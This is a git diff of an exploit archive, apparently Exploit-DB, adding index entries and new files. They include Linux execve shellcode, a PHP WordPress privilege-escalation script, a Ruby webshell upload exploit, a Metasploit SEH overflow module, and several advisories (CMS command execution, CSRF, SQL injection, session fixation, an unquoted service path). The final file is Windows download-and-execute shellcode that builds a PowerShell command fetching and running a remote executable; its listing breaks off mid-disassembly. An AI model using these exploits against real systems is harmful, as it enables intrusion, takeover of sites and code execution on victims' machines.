diff --git a/files.csv b/files.csv index 7000cdc82..64eb884ac 100755 --- a/files.csv +++ b/files.csv @@ -20050,7 +20050,7 @@ id,file,description,date,author,platform,type,port 22810,platforms/php/webapps/22810.txt,"pMachine 1.0/2.x Search Module Cross-Site Scripting Vulnerability",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 Command-Line Argument Buffer Overflow Vulnerability",2003-06-19,Matrix_DK,bsd,local,0 22812,platforms/php/webapps/22812.txt,"WebJeff Filemanager 1.6 File Disclosure Vulnerability",2003-06-20,"Adam Stephens",php,webapps,0 -22813,platforms/linux/local/22813.c,"Linux Kernel 2.2. / 2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability",2003-06-20,IhaQueR,linux,local,0 +22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability",2003-06-20,IhaQueR,linux,local,0 22814,platforms/linux/dos/22814.txt,"GNU GNATS 3.0 02 PR-Edit Command Line Option Heap Corruption Vulnerablity",2003-06-21,"dong-h0un U",linux,dos,0 22815,platforms/linux/local/22815.c,"GNU GNATS 3.113 Environment Variable Buffer Overflow Vulnerability",2003-06-21,Xpl017Elz,linux,local,0 22816,platforms/windows/dos/22816.txt,"Symantec Security Check RuFSI ActiveX Control Buffer Overflow Vulnerability",2003-06-23,"Cesar Cerrudo",windows,dos,0 @@ -36156,3 +36156,14 @@ id,file,description,date,author,platform,type,port 39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (Shell Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80 39973,platforms/linux/remote/39973.rb,"op5 v7.1.9 Configuration Command Execution",2016-06-17,metasploit,linux,remote,443 +39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80 +39975,platforms/lin_x86-64/shellcode/39975.c,"Linux x86_64 execve Shellcode - 15 bytes",2016-06-20,CripSlick,lin_x86-64,shellcode,0 +39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80 +39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80 +39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80 +39979,platforms/windows/shellcode/39979.c,"Windows XP - 10 - Download & Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0 +39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf)",2016-06-20,s0nk3y,windows,local,0 +39981,platforms/php/webapps/39981.html,"Airia - (Add Content) CSRF",2016-06-20,HaHwul,php,webapps,80 +39982,platforms/php/webapps/39982.rb,"Airia - Webshell Upload Exploit",2016-06-20,HaHwul,php,webapps,80 +39983,platforms/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80 +39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0 diff --git a/platforms/lin_x86-64/shellcode/39975.c b/platforms/lin_x86-64/shellcode/39975.c new file mode 100755 index 000000000..ce0a55720 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/39975.c @@ -0,0 +1,48 @@ +#include +#include + +// OS-20614 +// eben_s_dowling@georgiasouthern.edu + +/* +global _start + +_start: + +execve: + + mov rsi, rax + mov rdx, rsi + + mov r12 , 0x68732f6e69622f + push r12 + push rsp + pop rdi + mov al, 0x3b + syscall +*/ + + + +unsigned char code[] = \ + "\x48\x89\xc6" // mov %rax,%rsi + "\x48\x89\xf2" // mov %rsi,%rdx + "\x49\xbc\x2f\x62\x69\x6e\x2f" // movabs $0x68732f6e69622f,%r12 + "\x73\x68\x00" + "\x41\x54" // push %r12 + "\x54" // push %rsp + "\x5f" // pop %rdi + "\xb0\x3b" // mov $0x3b,%al + "\x0f\x05" // syscall +; + +main() +{ + + printf("Shellcode Length: %d\n", (int)strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file diff --git a/platforms/linux/local/22813.c b/platforms/linux/local/22813.c index 51eb8627d..dcb388887 100755 --- a/platforms/linux/local/22813.c +++ b/platforms/linux/local/22813.c @@ -1,6 +1,7 @@ -source: http://www.securityfocus.com/bid/8002/info +/* source: http://www.securityfocus.com/bid/8002/info A potential information disclosure vulnerability has been reported for the Linux /proc filesystem, specifically when invoking setuid applications. As a result, an unprivileged user may be able to read the contents of a setuid application's environment data. This could potentially, although unlikely, result in the disclosure of sensitive information, such as restricted file path information. +*/ /**************************************************************** * * diff --git a/platforms/php/webapps/39974.html b/platforms/php/webapps/39974.html new file mode 100755 index 000000000..96eab0e00 --- /dev/null +++ b/platforms/php/webapps/39974.html @@ -0,0 +1,114 @@ + + + + + + +
+ +
+ + + + \ No newline at end of file diff --git a/platforms/php/webapps/39976.txt b/platforms/php/webapps/39976.txt new file mode 100755 index 000000000..44705152d --- /dev/null +++ b/platforms/php/webapps/39976.txt @@ -0,0 +1,227 @@ +[+] Credits: hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/SNEWS-RCE-CSRF-XSS.txt + +[+] ISR: APPARITIONSEC + + +Vendor: +============ +snewscms.com + + +Product: +================ +sNews CMS v1.7.1 + + +Vulnerability Type: +=================================== +Persistent Remote Command Execution +Cross Site Request Forgeries (CSRF) +Persistent XSS + + +CVE Reference: +============== +N/A + + +Vulnerability Details: +====================== + +If an authenticated user happens to stumble upon an attackers webpage or +click an infected link they have a chance to get the following prizes, + +1) Persistent Remote Code Execution +2) Cross Site Request Forgeries +3) Persistent XSS + + +sNews has feature that allows PHP functions to be inserted for articles by +authenticated users under "Edit Article". However, there is no +CSRF token/checks to prevent unauthorized HTTP requests to be made on +behalf of that user. Furthermore, these commands will get stored in MySQL +database in the 'articles' table. So each time that sNews webpage is +visited it will execute. + +e.g. + +CSRF / RCE Under "Edit Article" Admin area. + +[func]system:|:"calc.exe"[/func] + +On line no 3270 of "snews.php" there is no input filtering allowing +arbitrary system calls. + +$returned = call_user_func_array($func[0], explode(',',$func[1])); + +//////////////////////////////////////////////////////////////////////////////////////////// + + +CSRF / Hijack SNews CMS accounts, the username however must be known in +advance, if known then that lucky user wins a changed password!. + + +//////////////////////////////////////////////////////////////////////////////////////////// + + +CSRF / arbitrary file deletion, we can delete arbitrary files in the +webroot which we can use to bypass access controls like ".htaccess" file. +allowing attackers to read/access files from those affected directories. + +On line 3080 "snews.php" direct usage of untrusted user input into the PHP +"unlink" function which deletes any files the attacker wants. + +if (isset($_GET['task']) == 'delete') { +$file_to_delete = $_GET['folder'].'/'.$_GET['file']; +@unlink($file_to_delete); +echo notification(0,'','snews_files'); + + +/////////////////////////////////////////////////////////////////////////////////////////// + + +Persistent XSS entry point also exists in same "Edit Article" Admin area, +but why bother when we have RCE option. + + +Exploit code(s): +=============== + +Remote Command Execution pop "calc.exe" POC. + +
+ + + + + + + + + + + + + + + + + + + + + + +
+ + +After we make HTTP request for the booby trapped article and KABOOM. + +http://localhost/snews1.7.1/uncategorized/remote-command-execution/ + + +CSRF - Account Hijack +===================== + +
+ + + + + + +
+ + +CSRF - Arbitrary File Deletion +=============================== + +1) Create file in htdocs / web root as a test e.g. "DELETEME.php" + +2) Visit following URL as authenticated user. + +http://localhost/snews1.7.1/?action=snews_files&task=delete&folder=Patches +Log&file=../../../DELETEME.php + +3) Files gone! + + + +Persistent XSS +=============== + +
+ + + + + + + + + + + + + + + + + + + + + + +
+ + + + +Disclosure Timeline: +================================= +Vendor Notification: No Replies +June 19, 2016 : Public Disclosure + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +================ +Critical +CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N + + +Description: +================================================ +Request Method(s): [+] GET / POST + +Vulnerable Product: [+] snews v1.7.1 +=========================================== + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +by hyp3rlinx diff --git a/platforms/php/webapps/39977.txt b/platforms/php/webapps/39977.txt new file mode 100755 index 000000000..6cf028df7 --- /dev/null +++ b/platforms/php/webapps/39977.txt @@ -0,0 +1,26 @@ +###################### +# Exploit Title : Joomla com_bt_media - SQL Injection +# Exploit Author : Persian Hack Team +# Vendor Homepage : http://extensions.joomla.org/extension/bt-media-gallery +# Category: [ Webapps ] +# Tested on: [ Win ] +# Version: 1.0 +# Date: 2016/06/19 +###################### +# +# PoC: + +# categories[0]= Parameter Vulnerable To SQL + +# Demo : + +# http://server/index.php?option=com_bt_media&view=list&categories[0]=%277&Itemid=134 + + +# Please Free Yaser Ebrahimi + +###################### +# Discovered by : Mojtaba MobhaM +# Greetz : T3NZOG4N & FireKernel & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members +# Homepage : persian-team.ir +###################### \ No newline at end of file diff --git a/platforms/php/webapps/39978.php b/platforms/php/webapps/39978.php new file mode 100755 index 000000000..01939c06d --- /dev/null +++ b/platforms/php/webapps/39978.php @@ -0,0 +1,183 @@ + + * Vendor Homepage: http://aa-team.com/ + * Software Link: http://codecanyon.net/item/premium-seo-pack-wordpress-plugin/6109437?s_rank=2 + * Version: 1.9.1.3 + * Tested on: Debian 8, PHP 5.6.17-3 + * Type: Authenticated (customer, subscriber) wp_options overwrite + * Time line: Found [05-Jun-2016], Vendor notified [05-Jun-2016], Vendor fixed: [???], [RD:1] + */ + + +require_once('curl.php'); +//OR +//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); +$curl = new CurlWrapper(); + + +$options = getopt("t:m:u:p:a:",array('tor:')); +echo "Current Options:\n"; +print_r($options); +for($i=4;$i>0;$i--){ + echo "Starting in $i \r"; + sleep(1); +} +echo "Starting.... \r"; +echo "\n"; + +$options = validateInput($options); + +if (!$options){ + showHelp(); +} + +if ($options['tor'] === true) +{ + echo " ### USING TOR ###\n"; + echo "Setting TOR Proxy...\n"; + $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/"); + $curl->addOption(CURLOPT_PROXYTYPE,7); + echo "Checking IPv4 Address\n"; + $curl->get('https://dynamicdns.park-your-domain.com/getip'); + echo "Got IP : ".$curl->getResponse()."\n"; + echo "Are you sure you want to do this?\nType 'wololo' to continue: "; + $answer = fgets(fopen ("php://stdin","r")); + if(trim($answer) != 'wololo'){ + die("Aborting!\n"); + } + echo "OK...\n"; +} + + +function logIn(){ + global $curl, $options; + file_put_contents('cookies.txt',"\n"); + $curl->setCookieFile('cookies.txt'); + $curl->get($options['t']); + $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In'); + $curl->post($options['t'].'/wp-login.php', $data); + $status = $curl->getTransferInfo('http_code'); + if ($status !== 302){ + echo "Login probably failed, aborting...\n"; + echo "Login response saved to login.html.\n"; + die(); + } + file_put_contents('login.html',$curl->getResponse()); +} + +function exploit(){ + global $curl, $options; + if ($options['m'] == 'admin_on') { + echo "Setting default role on registration to Administrator\n"; + /* Getting a nonce */ + $data = array('action'=>'pspLoadSection', 'section'=>'setup_backup'); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + $resp = json_decode($resp,true); + preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat); + if (!isset($mat[1])){ + die("Failed getting box_nonce\n"); + } + $nonce = $mat[1][0]; + $new_settings = array('default_role'=>'administrator', 'users_can_register'=>1); + $new_settings = urlencode(json_encode($new_settings)); + echo "Sending settings to update\n"; + $data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + $resp = json_decode($resp,true); + if (@$resp['status'] == 'ok'){ + echo "Admin mode is ON, go ahead an register yourself an Admin account! \n"; + } else { + echo "Setting admin mode failed \n"; + } + echo "Raw response: " . $curl->getResponse() . "\n"; + } + if ($options['m'] == 'admin_off') { + + echo "Setting default role on registration to Subscriber\n"; + /* Getting a nonce */ + $data = array('action'=>'pspLoadSection', 'section'=>'setup_backup'); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + $resp = json_decode($resp,true); + preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat); + if (!isset($mat[1])){ + die("Failed getting box_nonce\n"); + } + $nonce = $mat[1][0]; + $new_settings = array('default_role'=>'subscriber', 'users_can_register'=>0); + $new_settings = urlencode(json_encode($new_settings)); + echo "Sending settings to update\n"; + $data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + $resp = json_decode($resp,true); + if (@$resp['status'] == 'ok'){ + echo "Admin mode is OFF \n"; + } + echo "Raw response: " . $curl->getResponse() . "\n"; + } +} + + +logIn(); +exploit(); + + + +function validateInput($options){ + + if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ + return false; + } + if ( !isset($options['u']) ){ + return false; + } + if ( !isset($options['p']) ){ + return false; + } + if (!preg_match('~/$~',$options['t'])){ + $options['t'] = $options['t'].'/'; + } + if (!isset($options['m']) || !in_array($options['m'], array('admin_on','admin_off') ) ){ + return false; + } + if ($options['m'] == 'tag' && !isset($options['a'])){ + + } + $options['tor'] = isset($options['tor']); + + return $options; +} + + +function showHelp(){ + global $argv; + $help = << + @link http://github.com/svyatov/CurlWrapper + @license http://www.opensource.org/licenses/mit-license.html MIT License + +EOD; + echo $help."\n\n"; + die(); +} diff --git a/platforms/php/webapps/39981.html b/platforms/php/webapps/39981.html new file mode 100755 index 000000000..b3915d7ad --- /dev/null +++ b/platforms/php/webapps/39981.html @@ -0,0 +1,22 @@ + + +
+ + + + + + + +
+ + diff --git a/platforms/php/webapps/39982.rb b/platforms/php/webapps/39982.rb new file mode 100755 index 000000000..511e5112c --- /dev/null +++ b/platforms/php/webapps/39982.rb @@ -0,0 +1,70 @@ +# Exploit Title: Airia - Webshell Upload Vulnerability +# Date: 2016-06-20 +# Exploit Author: HaHwul +# Exploit Author Blog: www.hahwul.com +# Vendor Homepage: http://ytyng.com +# Software Link: https://github.com/ytyng/airia/archive/master.zip +# Version: Latest commit +# Tested on: Debian [wheezy] + +require "net/http" +require "uri" + +if ARGV.length !=2 +puts "Airia Webshell Upload Exploit(Vulnerability)" +puts "Usage: #>ruby airia_ws_exploit.rb [targetURL] [phpCode]" +puts " targetURL(ex): http://127.0.0.1/vul_test/airia" +puts " phpCode(ex): echo 'zzzzz'" +puts " Example : ~~.rb http://127.0.0.1/vul_test/airia 'echo zzzz'" +puts " exploit & code by hahwul[www.hahwul.com]" + +else + +target_url = ARGV[0] # http://127.0.0.1/jmx2-Email-Tester/ +shell = ARGV[1] # PHP Code +exp_url = target_url + "/editor.php" +uri = URI.parse(exp_url) +http = Net::HTTP.new(uri.host, uri.port) + +request = Net::HTTP::Post.new(uri.request_uri) +request["Accept"] = "*/*" +request["User-Agent"] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)" +request["Connection"] = "close" +request["Referer"] = "http://127.0.0.1/vul_test/airia/editor.php?file=1&group=%281%20AND%20%28SELECT%20SLEEP%2830%29%29%29%20--%20" +request["Accept-Language"] = "en" +request["Content-Type"] = "application/x-www-form-urlencoded" +request.set_form_data({"mode"=>"save",""=>"","file"=>"shell.php","scrollvalue"=>"","contents"=>"","group"=>"vvv_html"}) +response = http.request(request) + +puts "[Result] Status code: "+response.code +puts "[Result] Open Browser: "+target_url+"/data/vvv_html/shell.php" +end + +=begin +### Run Step. + +#> ruby 3.rb http://127.0.0.1/vul_test/airia "echo 123;" +[Result] Status code: 302 +[Result] Open Browser: http://127.0.0.1/vul_test/airia/data/vvv_html/shell.php + +output: Airia Webshell Exploit123 + +### HTTP Request / Response +[Request] +POST /vul_test/airia/editor.php HTTP/1.1 +Host: 127.0.0.1 +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) +Connection: close +Referer: http://127.0.0.1/vul_test/airia/editor.php?file=1&group=%281%20AND%20%28SELECT%20SLEEP%2830%29%29%29%20--%20 +Content-Type: application/x-www-form-urlencoded +Content-Length: 65 +Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; DBSR_session=01ltbc0gf3i35kkcf5f6o6hir1; __utma=96992031.1679083892.1466384142.1466384142.1466384142.1; __utmb=96992031.2.10.1466384142; __utmc=96992031; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) + +mode=save&file=1.php&scrollvalue=&contents=&group=vvv_html + +[Response] Uloaded file +http://127.0.0.1/vul_test/airia/data/vvv_html/1.html +=end + diff --git a/platforms/php/webapps/39983.txt b/platforms/php/webapps/39983.txt new file mode 100755 index 000000000..5f9d0fa62 --- /dev/null +++ b/platforms/php/webapps/39983.txt @@ -0,0 +1,145 @@ +[+] Credits: John Page aka hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/SYMPHONY-CMS-SESSION-FIXATION.txt + +[+] ISR: APPARITIONSEC + + +Vendor: +==================== +www.getsymphony.com + + +Product: +================== +Symphony CMS v2.6.7 + +Download: +http://www.getsymphony.com/download/ + + +Symphony is a XSLT-powered open source content management system. + + +Vulnerability Type: +=================== +Session Fixation + + +CVE Reference: +============== +CVE-2016-4309 + + +Vulnerability Details: +===================== + +Symphony CMS is prone to "Session Fixation" allowing attackers to preset a +users PHPSESSID "Session Identifier". +If the application is deployed using an insecure setup with PHP.INI +"session.use_only_cookies" not enabled, attackers can then send +victims a link to the vulnerable application with the "PHPSESSID" already +initialized as Symphony does not use or call +"session_regenerate_id()" upon successful user authentication. + +Note: as per php.net/manual/en/session.configuration.php +"session.use_only_cookies=1" is default since PHP 4.3.0. + +e.g. + +"http://localhost/symphony/?PHPSESSID=APPARITION666". + +As Symphonys Session ID is not regenerated it can result in arbitrary +Session ID being 'Fixated' to a user, if that user authenticates using +this attacker supplied session fixated link, the attacker can now access +the affected application from a different Computer/Browser +and have the same level of access to that of the victim. Default Cookie +lifetime for Symphony CMS is up to two weeks. + + + +Reproduction steps: +===================== + +Edit PHP.INI and change following settings to 'session.use_only_cookies=0' +if applicable, as POC test. + + +1) Telnet localhost 80 + +2) make HTTP request with a prefixed PHPSESSID + +GET /symphony-2.6.7/symphony/?PHPSESSID=PWN3D666 HTTP/1.1 +Host: localhost +Connection: close + +3) Hit enter twice + + +HTTP/1.1 200 OK +Date: Mon, 16 May 2016 02:06:47 GMT +Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1l PHP/5.6.8 +X-Powered-By: PHP/5.6.8 +Set-Cookie: PHPSESSID=PWNED666; expires=Mon, 30-May-2016 02:06:48 GMT; +Max-Age=1209600; path=/symphony-2.6.7; httponly +Content-Length: 1501 +Connection: close +Content-Type: text/html; charset=UTF-8 + + +Exploit code(s): +=============== + +1) +http://localhost/symphony-2.6.7/symphony/publish/articles/?PHPSESSID=hyp3rlinx + +2) http://localhost/symphony-2.6.7/symphony/?PHPSESSID=APPARITION + + +Disclosure Timeline: +===================================== +Vendor Notification: May 3, 2016 +Vendor Release Fix: May 23, 2016 +June 20, 2016 : Public Disclosure. + + +Exploitation Method: +==================== +Remote + + +Severity Level: +================ +6.8 (Medium) +CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N + + + +Description: +============================================== +Request Method(s): [+] GET / POST + + +Vulnerable Product: [+] Symphony CMS 2.6.7 + + +Vulnerable Parameter(s): [+] 'PHPSESSID' +=============================================== + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +hyp3rlinx diff --git a/platforms/windows/local/39980.rb b/platforms/windows/local/39980.rb new file mode 100755 index 000000000..6b5813903 --- /dev/null +++ b/platforms/windows/local/39980.rb @@ -0,0 +1,72 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Tomabo M3U SEH Based Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack over flow in Tomabo MP4 Player <= 3.11.6. When + the application is used to open a specially crafted m3u file, an buffer is overwritten allowing + for the execution of arbitrary code. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'yokoacc', # Proof of concept + 'nudragn', # Proof of concept + 'rungga_reksya', # Proof of concept + 'rahmat_nurfauzi' # Metasploit module + ], + 'References' => + [ + [ 'EDB', '38486' ], + [ 'URL', 'http://www.tomabo.com/mp4-player/download.html'], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'seh', + 'StackAdjustment' => -3500, + 'DisableNops' => 'True', + }, + 'Payload' => + { + 'Space' => 1800, + 'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x1a\x20" + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Tomabo MP4 Player <= 3.11.6', { 'Ret' => 0x00401CA9 } ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Oct 18 2015', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']), + ], self.class) + end + + def exploit + sploit = rand_text_alpha_upper(1028) + sploit << "\xeb\x08\x90\x90" # short jump 8 bytes + sploit << [target.ret].pack('V') # universal + sploit << "\x90" * 16 + sploit << payload.encoded + sploit << "\x44" * 436 + + playlist = sploit + print_status("Creating '#{datastore['FILENAME']}' file ...") + + file_create(playlist) + end +end \ No newline at end of file diff --git a/platforms/windows/local/39984.txt b/platforms/windows/local/39984.txt new file mode 100755 index 000000000..e67d4948b --- /dev/null +++ b/platforms/windows/local/39984.txt @@ -0,0 +1,63 @@ + +ACROS Security 0patch (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation + + +Vendor: ACROS, d.o.o. +Product web page: https://www.0patch.com +Affected version: 2016.05.19.539 + +Summary: 0patch (pronounced 'zero patch') is a platform for instantly +distributing, applying and removing microscopic binary patches to/from +running processes without having to restart these processes (much less +reboot the entire computer). + +Desc: The application suffers from an unquoted search path issue impacting +the service '0patchservice' for Windows deployed as part of 0patch solution. +This could potentially allow an authorized but non-privileged local user to +execute arbitrary code with elevated privileges on the system. A successful +attempt would require the local user to be able to insert their code in the +system root path undetected by the OS or other security applications where +it could potentially be executed during application startup or reboot. If +successful, the local user’s code would execute with the elevated privileges +of the application. + +Tested on: Microsoft Windows 7 Ultimate SP1 (EN) + Microsoft Windows 7 Professional SP1 (EN) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5331 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5331.php + +Vendor: https://0patch.blogspot.com/2016/06/new-release-0patch-agent-20160614850.html + + +08.06.2016 + +-- + + +C:\>sc qc 0patchservice +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: 0patchservice + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\0patch\Agent\0PatchServicex64.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : 0patch Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\>cacls "C:\Program Files (x86)\0patch\Agent\0PatchServicex64.exe" +C:\Program Files (x86)\0patch\Agent\0patchServicex64.exe NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + BUILTIN\Users:(ID)R + + +C:\> diff --git a/platforms/windows/shellcode/39979.c b/platforms/windows/shellcode/39979.c new file mode 100755 index 000000000..48a600e1c --- /dev/null +++ b/platforms/windows/shellcode/39979.c @@ -0,0 +1,147 @@ +/* +[+] Author : B3mB4m +[~] Contact : b3mb4m@protonmail.com +[~] Project : https://github.com/b3mb4m/shellsploit-framework +[~] Greetz : Bomberman,T-Rex,Pixi +----------------------------------------------------------- + +Tested on : + Windows XP/SP3 x86 + Windows 7 Ultimate x64 + Windows 8.1 Pro Build 9600 x64 + Windows 10 Home x64 + + +* This source belongs to shellsploit project under MIT licence. + +* If you convert it an executable file, its will be FUD(without any encrypt). + -PoC : https://nodistribute.com/result/qwxU3DmFCR2M0OrQt + + + + 0x0: 31c9 xor ecx, ecx + 0x2: b957696e45 mov ecx, 0x456e6957 + 0x7: eb04 jmp 0xd + 0x9: 31c9 xor ecx, ecx + 0xb: eb00 jmp 0xd + 0xd: 31c0 xor eax, eax + 0xf: 31db xor ebx, ebx + 0x11: 31d2 xor edx, edx + 0x13: 31ff xor edi, edi + 0x15: 31f6 xor esi, esi + 0x17: 648b7b30 mov edi, dword ptr fs:[ebx + 0x30] + 0x1b: 8b7f0c mov edi, dword ptr [edi + 0xc] + 0x1e: 8b7f1c mov edi, dword ptr [edi + 0x1c] + 0x21: 8b4708 mov eax, dword ptr [edi + 8] + 0x24: 8b7720 mov esi, dword ptr [edi + 0x20] + 0x27: 8b3f mov edi, dword ptr [edi] + 0x29: 807e0c33 cmp byte ptr [esi + 0xc], 0x33 + 0x2d: 75f2 jne 0x21 + 0x2f: 89c7 mov edi, eax + 0x31: 03783c add edi, dword ptr [eax + 0x3c] + 0x34: 8b5778 mov edx, dword ptr [edi + 0x78] + 0x37: 01c2 add edx, eax + 0x39: 8b7a20 mov edi, dword ptr [edx + 0x20] + 0x3c: 01c7 add edi, eax + 0x3e: 89dd mov ebp, ebx + 0x40: 81f957696e45 cmp ecx, 0x456e6957 + 0x46: 0f8530010000 jne 0x17c + 0x4c: 8b34af mov esi, dword ptr [edi + ebp*4] + 0x4f: 01c6 add esi, eax + 0x51: 45 inc ebp + 0x52: 390e cmp dword ptr [esi], ecx + 0x54: 75f6 jne 0x4c + 0x56: 8b7a24 mov edi, dword ptr [edx + 0x24] + 0x59: 01c7 add edi, eax + 0x5b: 668b2c6f mov bp, word ptr [edi + ebp*2] + 0x5f: 8b7a1c mov edi, dword ptr [edx + 0x1c] + 0x62: 01c7 add edi, eax + 0x64: 8b7caffc mov edi, dword ptr [edi + ebp*4 - 4] + 0x68: 01c7 add edi, eax + 0x6a: 89d9 mov ecx, ebx + 0x6c: b1ff mov cl, 0xff + 0x6e: 53 push ebx + 0x6f: e2fd loop 0x6e + 0x71: 68293b7d22 push 0x227d3b29 + 0x76: 6865786527 push 0x27657865 + 0x7b: 687474792e push 0x2e797474 + 0x80: 6828277075 push 0x75702728 + 0x85: 6863757465 push 0x65747563 + 0x8a: 686c457865 push 0x6578456c + 0x8f: 685368656c push 0x6c656853 + 0x94: 686f6e292e push 0x2e296e6f + 0x99: 6863617469 push 0x69746163 + 0x9e: 6870706c69 push 0x696c7070 + 0xa3: 686c6c2e41 push 0x412e6c6c + 0xa8: 6820536865 push 0x65685320 + 0xad: 682d636f6d push 0x6d6f632d + 0xb2: 6865637420 push 0x20746365 + 0xb7: 682d4f626a push 0x6a624f2d + 0xbc: 68284e6577 push 0x77654e28 + 0xc1: 682729203b push 0x3b202927 + 0xc6: 682e657865 push 0x6578652e + 0xcb: 6875747479 push 0x79747475 + 0xd0: 682c202770 push 0x7027202c + 0xd5: 6865786527 push 0x27657865 + 0xda: 687474792e push 0x2e797474 + 0xdf: 68362f7075 push 0x75702f36 + 0xe4: 68742f7838 push 0x38782f74 + 0xe9: 6861746573 push 0x73657461 + 0xee: 6874792f6c push 0x6c2f7974 + 0xf3: 682f707574 push 0x7475702f + 0xf8: 687468616d push 0x6d616874 + 0xfd: 6873677461 push 0x61746773 + 0x102: 686c692f7e push 0x7e2f696c + 0x107: 687274682e push 0x2e687472 + 0x10c: 68652e6561 push 0x61652e65 + 0x111: 682f2f7468 push 0x68742f2f + 0x116: 687470733a push 0x3a737074 + 0x11b: 6828276874 push 0x74682728 + 0x120: 6846696c65 push 0x656c6946 + 0x125: 686c6f6164 push 0x64616f6c + 0x12a: 68446f776e push 0x6e776f44 + 0x12f: 686e74292e push 0x2e29746e + 